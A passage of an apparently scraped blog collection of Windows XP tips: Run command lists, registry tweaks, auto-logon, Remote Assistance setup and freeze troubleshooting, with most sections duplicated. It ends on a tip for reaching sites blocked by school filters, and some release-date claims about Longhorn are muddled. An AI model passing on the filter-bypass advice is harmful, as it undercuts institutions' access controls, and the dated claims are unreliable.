5. For those skilled in the art of DOS batch files, XP has a number of interesting new commands. These include 'eventcreate' and 'eventtriggers' for creating and watching system events, 'typeperf' for monitoring performance of various subsystems, and 'schtasks' for handling scheduled tasks. As usual, typing the command name followed by /? will give a list of options -- they're all far too baroque to go into here.
6. XP has IP version 6 support -- the next generation of IP. Unfortunately this is more than your ISP has, so you can only experiment with this on your LAN. Type 'ipv6 install' into Run... (it's OK, it won't ruin your existing network setup) and then 'ipv6 /?' at the command line to find out more. If you don't know what IPv6 is, don't worry and don't bother.
7. You can at last get rid of tasks on the computer from the command line by using 'taskkill /pid' and the task number, or just 'tskill' and the process number. Find that out by typing 'tasklist', which will also tell you a lot about what's going on in your system.
8. XP will treat Zip files like folders, which is nice if you've got a fast machine. On slower machines, you can make XP leave zip files well alone by typing 'regsvr32 /u zipfldr.dll' at the command line. If you change your mind later, you can put things back as they were by typing 'regsvr32 zipfldr.dll'.
9. XP has ClearType -- Microsoft's anti-aliasing font display technology -- but doesn't have it enabled by default. It's well worth trying, especially if you were there for DOS and all those years of staring at a screen have given you the eyes of an astigmatic bat. To enable ClearType, right click on the desktop, select Properties, Appearance, Effects, select ClearType from the second drop-down menu and enable the selection. Expect best results on laptop displays. If you want to use ClearType on the Welcome login screen as well, set the registry entry HKEY_USERS/.DEFAULT/Control Panel/Desktop/FontSmoothingType to 2.
10. You can use Remote Assistance to help a friend who's using network address translation (NAT) on a home network, but not automatically. Get your pal to email you a Remote Assistance invitation and edit the file. Under the RCTICKET attribute will be a NAT IP address, like 192.168.1.10. Replace this with your chum's real IP address -- they can find this out by going to www.whatismyip.com -- and get them to make sure that they've got port 3389 open on their firewall and forwarded to the errant computer.
11. You can run a program as a different user without logging out and back in again. Right click the icon, select Run As... and enter the user name and password you want to use. This only applies for that run. The trick is particularly useful if you need to have administrative permissions to install a program, which many require. Note that you can have some fun by running programs multiple times on the same system as different users, but this can have unforeseen effects.
12. Windows XP can be very insistent about you checking for auto updates, registering a Passport, using Windows Messenger and so on. After a while, the nagging goes away, but if you feel you might slip the bonds of sanity before that point, run Regedit, go to HKEY_CURRENT_USER/Software/Microsoft/Windows/Current Version/Explorer/Advanced and create a DWORD value called EnableBalloonTips with a value of 0.
13. You can start up without needing to enter a user name or password. Select Run... from the start menu and type 'control userpasswords2', which will open the user accounts application. On the Users tab, clear the box for Users Must Enter A User Name And Password To Use This Computer, and click on OK. An Automatically Log On dialog box will appear; enter the user name and password for the account you want to use.
14. Internet Explorer 6 will automatically delete temporary files, but only if you tell it to. Start the browser, select Tools / Internet Options... and Advanced, go down to the Security area and check the box to Empty Temporary Internet Files folder when browser is closed.
15. XP comes with a free Network Activity Light, just in case you can't see the LEDs twinkle on your network card. Right click on My Network Places on the desktop, then select Properties. Right click on the description for your LAN or dial-up connection, select Properties, then check the Show icon in notification area when connected box. You'll now see a tiny network icon on the right of your task bar that glimmers nicely during network traffic.
16. The Start Menu can be leisurely when it decides to appear, but you can speed things along by changing the registry entry HKEY_CURRENT_USER/Control Panel/Desktop/MenuShowDelay from the default 400 to something a little snappier. Like 0.
17. You can rename loads of files at once in Windows Explorer. Highlight a set of files in a window, then right click on one and rename it. All the other files will be renamed to that name, with individual numbers in brackets to distinguish them. Also, in a folder you can arrange icons in alphabetised groups by View, Arrange Icon By... Show In Groups.
18. Windows Media Player will display the cover art for albums as it plays the tracks -- if it found the picture on the Internet when you copied the tracks from the CD. If it didn't, or if you have lots of pre-WMP music files, you can put your own copy of the cover art in the same directory as the tracks. Just call it folder.jpg and Windows Media Player will pick it up and display it.
19. Windows key + Break brings up the System Properties dialogue box; Windows key + D brings up the desktop; Windows key + Tab moves through the taskbar buttons.
20. The next release of Windows XP, codenamed Longhorn, is due out late next year or early 2003 and won't be much to write home about. The next big release is codenamed Blackcomb and will be out in 2003/2004.
117 Run Commands In Windows Xp
1. Accessibility Controls - access.cpl
2. Accessibility Wizard - accwiz
3. Add Hardware Wizard - hdwwiz.cpl
4. Add/Remove Programs - appwiz.cpl
5. Administrative Tools - control admintools
6. Automatic Updates - wuaucpl.cpl
7. Bluetooth Transfer Wizard - fsquirt
8. Calculator - calc
9. Certificate Manager - certmgr.msc
10. Character Map - charmap
11. Check Disk Utility - chkdsk
12. Clipboard Viewer - clipbrd
13. Command Prompt - cmd
14. Component Services - dcomcnfg
15. Computer Management - compmgmt.msc
16. Control Panel - control
17. Date and Time Properties - timedate.cpl
18. DDE Shares - ddeshare
19. Device Manager - devmgmt.msc
20. Direct X Troubleshooter - dxdiag
21. Disk Cleanup Utility - cleanmgr
22. Disk Defragment - dfrg.msc
23. Disk Management - diskmgmt.msc
24. Disk Partition Manager - diskpart
25. Display Properties - control desktop
26. Display Properties - desk.cpl
27. Dr. Watson System Troubleshooting Utility - drwtsn32
28. Driver Verifier Utility - verifier
29. Event Viewer - eventvwr.msc
30. Files and Settings Transfer Tool - migwiz
31. File Signature Verification Tool - sigverif
32. Findfast - findfast.cpl
33. Firefox - firefox
34. Folders Properties - control folders
35. Fonts - control fonts
36. Fonts Folder - fonts
37. Free Cell Card Game - freecell
38. Game Controllers - joy.cpl
39. Group Policy Editor (for xp professional) - gpedit.msc
40. Hearts Card Game - mshearts
41. Help and Support - helpctr
42. HyperTerminal - hypertrm
43. Iexpress Wizard - iexpress
44. Indexing Service - ciadv.msc
45. Internet Connection Wizard - icwconn1
46. Internet Explorer - iexplore
47. Internet Properties - inetcpl.cpl
48. Keyboard Properties - control keyboard
49. Local Security Settings - secpol.msc
50. Local Users and Groups - lusrmgr.msc
51. Logs You Out Of Windows - logoff
52. Malicious Software Removal Tool - mrt
53. Microsoft Chat - winchat
54. Microsoft Movie Maker - moviemk
55. Microsoft Paint - mspaint
56. Microsoft Syncronization Tool - mobsync
57. Minesweeper Game - winmine
58. Mouse Properties - control mouse
59. Mouse Properties - main.cpl
60. Netmeeting - conf
61. Network Connections - control netconnections
62. Network Connections - ncpa.cpl
63. Network Setup Wizard - netsetup.cpl
64. Notepad notepad
65. Object Packager - packager
66. ODBC Data Source Administrator - odbccp32.cpl
67. On Screen Keyboard - osk
68. Outlook Express - msimn
69. Paint - pbrush
70. Password Properties - password.cpl
71. Performance Monitor - perfmon.msc
72. Performance Monitor - perfmon
73. Phone and Modem Options - telephon.cpl
74. Phone Dialer - dialer
75. Pinball Game - pinball
76. Power Configuration - powercfg.cpl
77. Printers and Faxes - control printers
78. Printers Folder - printers
79. Regional Settings - intl.cpl
80. Registry Editor - regedit
81. Registry Editor - regedit32
82. Remote Access Phonebook - rasphone
83. Remote Desktop - mstsc
84. Removable Storage - ntmsmgr.msc
85. Removable Storage Operator Requests - ntmsoprq.msc
86. Resultant Set of Policy (for xp professional) - rsop.msc
87. Scanners and Cameras - sticpl.cpl
88. Scheduled Tasks - control schedtasks
89. Security Center - wscui.cpl
90. Services - services.msc
91. Shared Folders - fsmgmt.msc
92. Shuts Down Windows - shutdown
93. Sounds and Audio - mmsys.cpl
94. Spider Solitare Card Game - spider
95. SQL Client Configuration - cliconfg
96. System Configuration Editor - sysedit
97. System Configuration Utility - msconfig
98. System Information - msinfo32
99. System Properties - sysdm.cpl
100. Task Manager - taskmgr
101. TCP Tester - tcptest
102. Telnet Client - telnet
103. User Account Management - nusrmgr.cpl
104. Utility Manager - utilman
105. Windows Address Book - wab
106. Windows Address Book Import Utility - wabmig
107. Windows Explorer - explorer
108. Windows Firewall - firewall.cpl
109. Windows Magnifier - magnify
110. Windows Management Infrastructure - wmimgmt.msc
111. Windows Media Player - wmplayer
112. Windows Messenger - msmsgs
113. Windows System Security Tool - syskey
114. Windows Update Launches - wupdmgr
115. Windows Version - winver116. Windows XP Tour Wizard - tourstart
117. Wordpad - write
1. Accessibility Controls - access.cpl
2. Accessibility Wizard - accwiz
3. Add Hardware Wizard - hdwwiz.cpl
4. Add/Remove Programs - appwiz.cpl
5. Administrative Tools - control admintools
6. Automatic Updates - wuaucpl.cpl
7. Bluetooth Transfer Wizard - fsquirt
8. Calculator - calc
9. Certificate Manager - certmgr.msc
10. Character Map - charmap
11. Check Disk Utility - chkdsk
12. Clipboard Viewer - clipbrd
13. Command Prompt - cmd
14. Component Services - dcomcnfg
15. Computer Management - compmgmt.msc
16. Control Panel - control
17. Date and Time Properties - timedate.cpl
18. DDE Shares - ddeshare
19. Device Manager - devmgmt.msc
20. Direct X Troubleshooter - dxdiag
21. Disk Cleanup Utility - cleanmgr
22. Disk Defragment - dfrg.msc
23. Disk Management - diskmgmt.msc
24. Disk Partition Manager - diskpart
25. Display Properties - control desktop
26. Display Properties - desk.cpl
27. Dr. Watson System Troubleshooting Utility - drwtsn32
28. Driver Verifier Utility - verifier
29. Event Viewer - eventvwr.msc
30. Files and Settings Transfer Tool - migwiz
31. File Signature Verification Tool - sigverif
32. Findfast - findfast.cpl
33. Firefox - firefox
34. Folders Properties - control folders
35. Fonts - control fonts
36. Fonts Folder - fonts
37. Free Cell Card Game - freecell
38. Game Controllers - joy.cpl
39. Group Policy Editor (for xp professional) - gpedit.msc
40. Hearts Card Game - mshearts
41. Help and Support - helpctr
42. HyperTerminal - hypertrm
43. Iexpress Wizard - iexpress
44. Indexing Service - ciadv.msc
45. Internet Connection Wizard - icwconn1
46. Internet Explorer - iexplore
47. Internet Properties - inetcpl.cpl
48. Keyboard Properties - control keyboard
49. Local Security Settings - secpol.msc
50. Local Users and Groups - lusrmgr.msc
51. Logs You Out Of Windows - logoff
52. Malicious Software Removal Tool - mrt
53. Microsoft Chat - winchat
54. Microsoft Movie Maker - moviemk
55. Microsoft Paint - mspaint
56. Microsoft Syncronization Tool - mobsync
57. Minesweeper Game - winmine
58. Mouse Properties - control mouse
59. Mouse Properties - main.cpl
60. Netmeeting - conf
61. Network Connections - control netconnections
62. Network Connections - ncpa.cpl
63. Network Setup Wizard - netsetup.cpl
64. Notepad notepad
65. Object Packager - packager
66. ODBC Data Source Administrator - odbccp32.cpl
67. On Screen Keyboard - osk
68. Outlook Express - msimn
69. Paint - pbrush
70. Password Properties - password.cpl
71. Performance Monitor - perfmon.msc
72. Performance Monitor - perfmon
73. Phone and Modem Options - telephon.cpl
74. Phone Dialer - dialer
75. Pinball Game - pinball
76. Power Configuration - powercfg.cpl
77. Printers and Faxes - control printers
78. Printers Folder - printers
79. Regional Settings - intl.cpl
80. Registry Editor - regedit
81. Registry Editor - regedit32
82. Remote Access Phonebook - rasphone
83. Remote Desktop - mstsc
84. Removable Storage - ntmsmgr.msc
85. Removable Storage Operator Requests - ntmsoprq.msc
86. Resultant Set of Policy (for xp professional) - rsop.msc
87. Scanners and Cameras - sticpl.cpl
88. Scheduled Tasks - control schedtasks
89. Security Center - wscui.cpl
90. Services - services.msc
91. Shared Folders - fsmgmt.msc
92. Shuts Down Windows - shutdown
93. Sounds and Audio - mmsys.cpl
94. Spider Solitare Card Game - spider
95. SQL Client Configuration - cliconfg
96. System Configuration Editor - sysedit
97. System Configuration Utility - msconfig
98. System Information - msinfo32
99. System Properties - sysdm.cpl
100. Task Manager - taskmgr
101. TCP Tester - tcptest
102. Telnet Client - telnet
103. User Account Management - nusrmgr.cpl
104. Utility Manager - utilman
105. Windows Address Book - wab
106. Windows Address Book Import Utility - wabmig
107. Windows Explorer - explorer
108. Windows Firewall - firewall.cpl
109. Windows Magnifier - magnify
110. Windows Management Infrastructure - wmimgmt.msc
111. Windows Media Player - wmplayer
112. Windows Messenger - msmsgs
113. Windows System Security Tool - syskey
114. Windows Update Launches - wupdmgr
115. Windows Version - winver116. Windows XP Tour Wizard - tourstart
117. Wordpad - write
Cannot enable Show Hidden files Check
A common virus disables the Show hidden files and folders function in Windows XP. Here is how to enable it again.
The symptom of this problem is every time you select the Show hidden files and folders options under Folder Options, the screen just flashes when you click OK and the hidden files and folders are not unhidden.
You can fix this problem with a registry hack:
1. Click Start > Run and type REGEDIT
2. Click the plus sign next to HKEY_CURRENT_USER then SOFTWARE then Microsoft
then Windows then CurrentVersion then Explorer then Advanced then Folder
then Hidden then Showall
On the right side, double click on the checked value and give it a value of 1.
You should now be able to enable hidden files and folders
A common virus disables the Show hidden files and folders function in Windows XP. Here is how to enable it again.
The symptom of this problem is every time you select the Show hidden files and folders options under Folder Options, the screen just flashes when you click OK and the hidden files and folders are not unhidden.
You can fix this problem with a registry hack:
1. Click Start > Run and type REGEDIT
2. Click the plus sign next to HKEY_CURRENT_USER then SOFTWARE then Microsoft
then Windows then CurrentVersion then Explorer then Advanced then Folder
then Hidden then Showall
On the right side, double click on the checked value and give it a value of 1.
You should now be able to enable hidden files and folders
Branding Windows With Your Name
open notepad dump the following lines into it and save it with the name OEMINFO.INI in the c:\windows\system32 directory:
[General]
Manufacturer=Your Name Here
Model=Your Model Here
[Support Information]
Line1=Your Name Here
Line2=Your Address Here
Line3=Your Email Address Here
open notepad dump the following lines into it and save it with the name OEMINFO.INI in the c:\windows\system32 directory:
[General]
Manufacturer=Your Name Here
Model=Your Model Here
[Support Information]
Line1=Your Name Here
Line2=Your Address Here
Line3=Your Email Address Here
ACCESS DIFFERENT PROGRAMS THROUGH RUN COMMAND
• appwiz.cpl — Used to run Add/Remove wizard
• Calc –Calculator
• Cfgwiz32 –ISDN Configuration Wizard
• Charmap –Character Map
• Chkdisk –Repair damaged files
• Cleanmgr –Cleans up hard drives
• Clipbrd –Windows Clipboard viewer
• Cmd –Opens a new Command Window
• Control mouse –Used to control mouse properties
• Control –Displays Control Panel
• Dcomcnfg –DCOM user security
• Debug –Assembly language programming tool
• Defrag –Defragmentation tool
• Drwatson –Records programs crash & snapshots
• Dxdiag –DirectX Diagnostic Utility
• Explorer –Windows Explorer
• Fontview –Graphical font viewer
• Fsmgmt.msc — Used to open shared folders
• Firewall.cpl — Used to configure windows firewall
• Ftp -ftp.exe program
• Hostname –Returns Computer’s name
• Hdwwiz.cpl — Used to run Add Hardware wizard
• Ipconfig –Displays IP configuration for all network adapters
• Logoff — Used to logoff the computer
• MMC –Microsoft Management Console
• Msconfig –Configuration to edit startup files
• Mstsc — Used to access remote desktop
• Mrc — Malicious Software Removal Tool
• Msinfo32 –Microsoft System Information Utility
• Nbtstat –Displays stats and current connections using NetBIOS over TCP/IP
• Netstat –Displays all active network connections
• Nslookup–Returns your local DNS server
• Osk —Used to access on screen keyboard
• Perfmon.msc — Used to configure the performance of Monitor.
• Ping –Sends data to a specified host/IP
• Powercfg.cpl — Used to configure power option
• Regedit –Registry Editor
• Regwiz — Registration wizard
• Sfc /scannow – System File Checker
• Sndrec32 –Sound Recorder
• Shutdown — Used to shutdown the windows
• Spider — Used to open spider solitaire card game
• Sfc / scannow — Used to run system file checker utility.
• Sndvol32 –Volume control for soundcard
• Sysedit – Edit system startup files
• Taskmgr –Task manager
• Telephon.cpl — Used to configure modem options.
• Telnet –Telnet program
• Tracert –Traces and displays all paths required to reach an internet host
• Winchat — Used to chat with Microsoft
• Wmplayer — Used to run Windows Media player
• Wab — Used to open Windows address Book.
• WinWord — Used to open Microsoft word
• Winipcfg –Displays IP configuration
• Winver — Used to check Windows Version
• Wupdmgr –Takes you to Microsoft Windows Update
• Write — Used to open WordPad
• appwiz.cpl — Used to run Add/Remove wizard
• Calc –Calculator
• Cfgwiz32 –ISDN Configuration Wizard
• Charmap –Character Map
• Chkdisk –Repair damaged files
• Cleanmgr –Cleans up hard drives
• Clipbrd –Windows Clipboard viewer
• Cmd –Opens a new Command Window
• Control mouse –Used to control mouse properties
• Control –Displays Control Panel
• Dcomcnfg –DCOM user security
• Debug –Assembly language programming tool
• Defrag –Defragmentation tool
• Drwatson –Records programs crash & snapshots
• Dxdiag –DirectX Diagnostic Utility
• Explorer –Windows Explorer
• Fontview –Graphical font viewer
• Fsmgmt.msc — Used to open shared folders
• Firewall.cpl — Used to configure windows firewall
• Ftp -ftp.exe program
• Hostname –Returns Computer’s name
• Hdwwiz.cpl — Used to run Add Hardware wizard
• Ipconfig –Displays IP configuration for all network adapters
• Logoff — Used to logoff the computer
• MMC –Microsoft Management Console
• Msconfig –Configuration to edit startup files
• Mstsc — Used to access remote desktop
• Mrc — Malicious Software Removal Tool
• Msinfo32 –Microsoft System Information Utility
• Nbtstat –Displays stats and current connections using NetBIOS over TCP/IP
• Netstat –Displays all active network connections
• Nslookup–Returns your local DNS server
• Osk —Used to access on screen keyboard
• Perfmon.msc — Used to configure the performance of Monitor.
• Ping –Sends data to a specified host/IP
• Powercfg.cpl — Used to configure power option
• Regedit –Registry Editor
• Regwiz — Registration wizard
• Sfc /scannow – System File Checker
• Sndrec32 –Sound Recorder
• Shutdown — Used to shutdown the windows
• Spider — Used to open spider solitaire card game
• Sfc / scannow — Used to run system file checker utility.
• Sndvol32 –Volume control for soundcard
• Sysedit – Edit system startup files
• Taskmgr –Task manager
• Telephon.cpl — Used to configure modem options.
• Telnet –Telnet program
• Tracert –Traces and displays all paths required to reach an internet host
• Winchat — Used to chat with Microsoft
• Wmplayer — Used to run Windows Media player
• Wab — Used to open Windows address Book.
• WinWord — Used to open Microsoft word
• Winipcfg –Displays IP configuration
• Winver — Used to check Windows Version
• Wupdmgr –Takes you to Microsoft Windows Update
• Write — Used to open WordPad
Change the Default Directory of Software Installation
You may want to change the location of your system default folder (C:\Program Files) from C drive to another system drives (D or E drive). By default software setup will attempt to install program in C:\Program Files directory. It is good practice to make the backup of the installed programs, if you installed all your programs in other than C drive. If you have little knowledge about editing windows registry then you can configure your computer for this purpose.
Follow the given steps to configure windows registry:
1. Click on Start button then type Regedit in Run option.
2. Here navigate to: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
3. In right side panel, double click on ProgramFileDir.
4. Now modify the value to any other drive (for example D:\Program Files).
Now close the registry editor and restart your computer after any changes to go into effect.
You may want to change the location of your system default folder (C:\Program Files) from C drive to another system drives (D or E drive). By default software setup will attempt to install program in C:\Program Files directory. It is good practice to make the backup of the installed programs, if you installed all your programs in other than C drive. If you have little knowledge about editing windows registry then you can configure your computer for this purpose.
Follow the given steps to configure windows registry:
1. Click on Start button then type Regedit in Run option.
2. Here navigate to: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
3. In right side panel, double click on ProgramFileDir.
4. Now modify the value to any other drive (for example D:\Program Files).
Now close the registry editor and restart your computer after any changes to go into effect.
Add Or Stop Programs During Startup
You can start or stop programs from executing at bootup by adding or deleting them to/from the run Keys in the Registry. Windows loads programs to start in the following order; Program listed in the Local Machine hive, then the Current User hive, then theWin.ini Run= and Load = lines. then finally programs in your Start Up folder.
To add or remove programs in the Registry
1.Open RegEdit
2.Go to the desired
KeyHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
3. Add a new String Value and name it anything you like
4. For the value data, enter the path and executable for the program you want to run.
By adding the value to the HKEY_CURRENT_USER hive instead allows the program to start only when that user is logged on.
If you add the value to the RunOnce key the program will run once and be removed from the key by Windows
You can start or stop programs from executing at bootup by adding or deleting them to/from the run Keys in the Registry. Windows loads programs to start in the following order; Program listed in the Local Machine hive, then the Current User hive, then theWin.ini Run= and Load = lines. then finally programs in your Start Up folder.
To add or remove programs in the Registry
1.Open RegEdit
2.Go to the desired
KeyHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
3. Add a new String Value and name it anything you like
4. For the value data, enter the path and executable for the program you want to run.
By adding the value to the HKEY_CURRENT_USER hive instead allows the program to start only when that user is logged on.
If you add the value to the RunOnce key the program will run once and be removed from the key by Windows
10 Steps you should do when your Computer Hangs up
You are in the middle of doing your work, suddenly you realized your computer hanged up. But the problem is, you have not saved your work! Don’t panic! There is a solution for that! And you can surely save your file! Here’s how:
1. Click on “ctrl-alt-delete” keys.
The windows task manager will then open, click on all programs that you don’t need and end the task. You will see that all programs on your taskbar will close one by one. If this will resolve the issue! – then save! (tip# 1: if you’re working on an MS Office application, it will automatically save your file in case the programs suddenly shut down — tip# 2: always save your file at least every 2 minutes by just simply clicking on the “diskette icon”— its just one click!)
2. If it did not resolve the issue,
are there some users logged on that computer? If so, go to switch user (for XP) and log off that user, go back to your log on screen and log on again.
The reason the computer hang up is because if there are many open programs and applications, these retains in the memory, if it is too much for the memory to handle, it freezes! Another reason too the computer hang up is because if you are connected to the internet via dial up, and you are running too many applications and opening many websites. So I suggest, if you are multimedia user or a heavy internet user, then you are better off with a higher memory, at least 512Mb of memory.
There are simple ways to avoid computer to freeze or hang up:
3. Clean your history at least once a week
>tools>internet options>clear history. I normally set my history to “0”, meaning, when I restart my computer, it doesn’t save history pages that I have visited
4. Delete all internet temporary files
>tools>internet options>delete files (do the “offline” content too!)
5. Delete cookies
(some do not do this, but I do delete cookies at least once a week!) >tools>internet options>delete cookies
6. Remove unnecessary programs that you no longer use
they are just occupying space and memory! >control panel>add/remove programs
7. Do defragmentation at least once a week
>point the mouse to “start” button, then right click “explore”>right click the mouse pointing to drive C (which is usually the main system logical drive) >properties>tools>defragment now
8. You can also check the logical drive’s volume for errors
>point the mouse to “start” button, then right click “explore”>right click the mouse pointing to drive C (I repeat, is usually the main system logical drive) >properties>tools>check now
9. It is better to have only one user being logged on.
Even if there are many users, make sure the user logs off after using the computer, rather than keeping it logged on and you do the switching of users. Switching users is good as long as you don’t keep all users logged on—I think that is more logical
10. Always shut down properly the computer
(do NOT use the power button when turning it off!
You are in the middle of doing your work, suddenly you realized your computer hanged up. But the problem is, you have not saved your work! Don’t panic! There is a solution for that! And you can surely save your file! Here’s how:
1. Click on “ctrl-alt-delete” keys.
The windows task manager will then open, click on all programs that you don’t need and end the task. You will see that all programs on your taskbar will close one by one. If this will resolve the issue! – then save! (tip# 1: if you’re working on an MS Office application, it will automatically save your file in case the programs suddenly shut down — tip# 2: always save your file at least every 2 minutes by just simply clicking on the “diskette icon”— its just one click!)
2. If it did not resolve the issue,
are there some users logged on that computer? If so, go to switch user (for XP) and log off that user, go back to your log on screen and log on again.
The reason the computer hang up is because if there are many open programs and applications, these retains in the memory, if it is too much for the memory to handle, it freezes! Another reason too the computer hang up is because if you are connected to the internet via dial up, and you are running too many applications and opening many websites. So I suggest, if you are multimedia user or a heavy internet user, then you are better off with a higher memory, at least 512Mb of memory.
There are simple ways to avoid computer to freeze or hang up:
3. Clean your history at least once a week
>tools>internet options>clear history. I normally set my history to “0”, meaning, when I restart my computer, it doesn’t save history pages that I have visited
4. Delete all internet temporary files
>tools>internet options>delete files (do the “offline” content too!)
5. Delete cookies
(some do not do this, but I do delete cookies at least once a week!) >tools>internet options>delete cookies
6. Remove unnecessary programs that you no longer use
they are just occupying space and memory! >control panel>add/remove programs
7. Do defragmentation at least once a week
>point the mouse to “start” button, then right click “explore”>right click the mouse pointing to drive C (which is usually the main system logical drive) >properties>tools>defragment now
8. You can also check the logical drive’s volume for errors
>point the mouse to “start” button, then right click “explore”>right click the mouse pointing to drive C (I repeat, is usually the main system logical drive) >properties>tools>check now
9. It is better to have only one user being logged on.
Even if there are many users, make sure the user logs off after using the computer, rather than keeping it logged on and you do the switching of users. Switching users is good as long as you don’t keep all users logged on—I think that is more logical
10. Always shut down properly the computer
(do NOT use the power button when turning it off!
How to disable/enable the usage of USB storage devices?
USB drives (also known as flash drive, mobile disk or pen drive) are becoming the most popular standard in these days to store and move data. USB support is available in PCs of both IBM-compatible and Apple computers. USB port support hot plugging and plug & play. The USB allows up to 127 devices to be connected to the bus via a single port. The driver name "usbstor.sys" is used to communicate any USB drives to the operating system.
USB drives are indeed very useful in these days but a user can easily use to transfer any confidential information from your computer to others and can also upload viruses affected files to your computer by accidentally or deliberately. But you can prevent the users to connect any USB drives in the computer by disabling the ability of "usbstor.sys" (USB driver) to load in system. It will block the USB storage devices only and your system USB keyboard, mouse and others USB devices will work properly.
Perform the following steps to block the USB storage devices:
To edit this feature, you will need to be logged into your computer with administrative rights.
First click on Start button to open "Run" and type "regedit" then press Ok button to open the Registry Editor.
In registry editor locate the given path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\USBSTOR
Here select the "USBSTOR" folder and in right side of the registry editor panel find the value with name "Start".
Double click on "Start" and then set its value 4 under "Value data" section.
Close the Registry editor and restart your computer for changes to apply.
Now when you want to restore the default setting, open the Registry Editor and set its value back to 3.
Now again close the Registry editor and restart your computer for changes to apply.
USB drives (also known as flash drive, mobile disk or pen drive) are becoming the most popular standard in these days to store and move data. USB support is available in PCs of both IBM-compatible and Apple computers. USB port support hot plugging and plug & play. The USB allows up to 127 devices to be connected to the bus via a single port. The driver name "usbstor.sys" is used to communicate any USB drives to the operating system.
USB drives are indeed very useful in these days but a user can easily use to transfer any confidential information from your computer to others and can also upload viruses affected files to your computer by accidentally or deliberately. But you can prevent the users to connect any USB drives in the computer by disabling the ability of "usbstor.sys" (USB driver) to load in system. It will block the USB storage devices only and your system USB keyboard, mouse and others USB devices will work properly.
Perform the following steps to block the USB storage devices:
To edit this feature, you will need to be logged into your computer with administrative rights.
First click on Start button to open "Run" and type "regedit" then press Ok button to open the Registry Editor.
In registry editor locate the given path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\USBSTOR
Here select the "USBSTOR" folder and in right side of the registry editor panel find the value with name "Start".
Double click on "Start" and then set its value 4 under "Value data" section.
Close the Registry editor and restart your computer for changes to apply.
Now when you want to restore the default setting, open the Registry Editor and set its value back to 3.
Now again close the Registry editor and restart your computer for changes to apply.
Restore Previously Open Folders After Shutdown
If you need to access lot of folders on your home computer or on the network regularly, then you can set them re-open automatically, when you will login, shutdown or restart your computer next time. There is no need to open regularly used folders manually, just configure the simple sitting, your computer will automatically reload all the previously opened windows.
By default windows XP disables this option to reload automatically all the previously opened windows, when you login on, shutdown or restart your computer.
Follow the given steps to configure your computer to reload previously opened folders automatically after shutdown.
To edit this feature, you will need to be logged into your computer with administrative rights.
First click on Start button then go to Control Panel.
Open the “Appearance and Themes” option in control panel then click on Folder Options.
A small windows dialog box will appear with the title “Folder options”, click on View tab.
Under the Advanced setting section, scroll down to bottom and click the “Restore previous folder windows at logon” option and then click Ok button to save sitting.
Now when you log off, restart or shutdown, your computer will automatically open the previously opened folders from the same location as before.
If you need to access lot of folders on your home computer or on the network regularly, then you can set them re-open automatically, when you will login, shutdown or restart your computer next time. There is no need to open regularly used folders manually, just configure the simple sitting, your computer will automatically reload all the previously opened windows.
By default windows XP disables this option to reload automatically all the previously opened windows, when you login on, shutdown or restart your computer.
Follow the given steps to configure your computer to reload previously opened folders automatically after shutdown.
To edit this feature, you will need to be logged into your computer with administrative rights.
First click on Start button then go to Control Panel.
Open the “Appearance and Themes” option in control panel then click on Folder Options.
A small windows dialog box will appear with the title “Folder options”, click on View tab.
Under the Advanced setting section, scroll down to bottom and click the “Restore previous folder windows at logon” option and then click Ok button to save sitting.
Now when you log off, restart or shutdown, your computer will automatically open the previously opened folders from the same location as before.
Set up and Use Internet Connection Sharing
To enable Internet Connection Sharing on a network connection You must be logged on to your computer with an owner account in order to complete this procedure. Open Network Connections. (
1. Click Start, click Control Panel, and then double-click Network Connections.)
2. Click the dial-up, local area network, PPPoE, or VPN connection you want to share, and then, under Network Tasks, click Change settings of this connection.
3. On the Advanced tab, select the Allow other network users to connect through this computer's Internet connection check box.
If you want this connection to dial automatically when another computer on your home or small office network attempts to access external resources, select the Establish a dial-up connection whenever a computer on my network attempts to access the Internet check box.
If you want other network users to enable or disable the shared Internet connection, select the Allow other network users to control or disable the shared Internet connection check box.
Under Internet Connection Sharing, in Home networking connection, select any adapter that connects the computer sharing its Internet connection to the other computers on your network. The Home networking connection is only present when two or more network adapters are installed on the computer.
To configure Internet options on your client computers for Internet Connection Sharing Open Internet Explorer. Click Start, point to All Programs, and then click Internet Explorer.)
On the Tools menu, click Internet Options.
On the Connections tab, click Never dial a connection, and then click LAN Settings. In Automatic configuration, clear the Automatically detect settings and Use automatic configuration script check boxes.
In Proxy Server, clear the Use a proxy server check box.
To enable Internet Connection Sharing on a network connection You must be logged on to your computer with an owner account in order to complete this procedure. Open Network Connections. (
1. Click Start, click Control Panel, and then double-click Network Connections.)
2. Click the dial-up, local area network, PPPoE, or VPN connection you want to share, and then, under Network Tasks, click Change settings of this connection.
3. On the Advanced tab, select the Allow other network users to connect through this computer's Internet connection check box.
If you want this connection to dial automatically when another computer on your home or small office network attempts to access external resources, select the Establish a dial-up connection whenever a computer on my network attempts to access the Internet check box.
If you want other network users to enable or disable the shared Internet connection, select the Allow other network users to control or disable the shared Internet connection check box.
Under Internet Connection Sharing, in Home networking connection, select any adapter that connects the computer sharing its Internet connection to the other computers on your network. The Home networking connection is only present when two or more network adapters are installed on the computer.
To configure Internet options on your client computers for Internet Connection Sharing Open Internet Explorer. Click Start, point to All Programs, and then click Internet Explorer.)
On the Tools menu, click Internet Options.
On the Connections tab, click Never dial a connection, and then click LAN Settings. In Automatic configuration, clear the Automatically detect settings and Use automatic configuration script check boxes.
In Proxy Server, clear the Use a proxy server check box.
Surf Blocked Sites
Are you frustrated because you are not able to visit your favorite websites in your school or college or any place where some sites are blocked? There are two methods to access these sites:
First Method:
Search the banned website, for example www.pctipsntricks.wordpress.com in Google or Yahoo! search engine. Then open the cached copy of that page to access the website. You can get also cache link of that website, if you search in Google with keyword cache:[URL] and get cache link to access the website.
